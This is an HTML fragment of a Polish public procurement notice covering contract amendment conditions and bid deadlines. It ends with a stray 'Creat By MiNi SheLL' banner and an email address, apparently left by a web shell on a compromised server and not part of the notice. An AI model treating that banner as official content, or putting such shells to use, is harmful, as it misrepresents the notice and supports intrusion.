Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Oprócz przypadków, o których mowa w art. 455 ustawy – Prawo zamówień publicznych, strony dopuszczają możliwość wprowadzania zmiany umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia którejkolwiek z następujących okoliczności:<br/>1)	obniżenia ceny przedmiotu umowy przez Wykonawcę, która może nastąpić w każdym czasie;<br/>2)	zaniechania produkcji określonego sprzętu, zmiany numeru katalogowego lub wprowadzenia przedmiotu umowy nowej generacji. Dostarczony zamiennik/równoważnik musi spełniać co najmniej wszystkie wymagania SWZ lub je przewyższać. Przesłanką niezbędną do podpisania aneksu jest również brak wzrostu wartości netto danego przedmiotu zamówienia <br/>w porównaniu z wartością przedstawioną w umowie;<br/>3)	zmiany ustawowej stawki podatku od towarów i usług VAT; zmiana będzie dotyczyła wynagrodzenia za części umowy jeszcze niezrealizowane, co do których Wykonawca nie pozostaje w zwłoce. W takim przypadku zmianie ulegną ceny brutto, ceny netto pozostaną bez zmian. Zmiana nastąpi automatycznie, nie wymaga formy aneksu;<br/>4)	w przypadku zmiany nr katalogowego lub nazwy własnej produktu objętego umową Wykonawca powiadomi o tym fakcie Zamawiającego;<br/>5)	gdy zajdą inne okoliczności niezależne od Wykonawcy i Zamawiającego, których nie można było przewidzieć przy dołożeniu należytej staranności w dniu zawarcia umowy <br/>(w szczególności wojna, ataki terrorystyczne, epidemia lub inne zdarzenia uniemożliwiające realizację przedmiotu umowy).<br/>6)	przedłużenie terminu realizacji zamówienia, o którym mowa w § 1 ust. 5 niniejszej umowy, może nastąpić w przypadku wystąpienia okoliczności siły wyższej, przez którą należy rozumieć zdarzenia niezależne od żadnej ze stron, zewnętrzne, niemożliwe do zapobieżenia, które nastąpiło po dniu wejścia w życie umowy, w szczególności: wojny, akty terroryzmu, klęski żywiołowe, strajki oraz akty władzy i administracji publicznej, przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni, odpowiadającą okresowi występowania okoliczności siły wyższej,<br/>7)	zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym bezpośredni wpływ na realizację przedmiotu zamówienia lub świadczenia stron umowy,<br/>8)	w przypadku zmiany albo rezygnacji z podwykonawcy, na którego zasoby wykonawca powoływał się w celu wykazania spełniania warunków udziału w postępowaniu Wykonawca jest obowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia warunki udziału w postępowaniu, w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia, poprzez przedstawienie w tym celu odpowiednich dokumentów, potwierdzających spełnianie warunków udziału <br/>w postępowaniu,<br/>9)	wszelkie zmiany, które będą konieczne do zagwarantowania zgodności umowy z wchodzącymi w życie po terminie składania ofert lub po zawarciu umowy przepisami prawa w zakresie wynikającym z tych przepisów.<br/><br/>Pozostałe zmiany umowy opisane są w par. 12 Wzoru umowy - cz. II SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-09-22 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-09-22 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-10-21</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com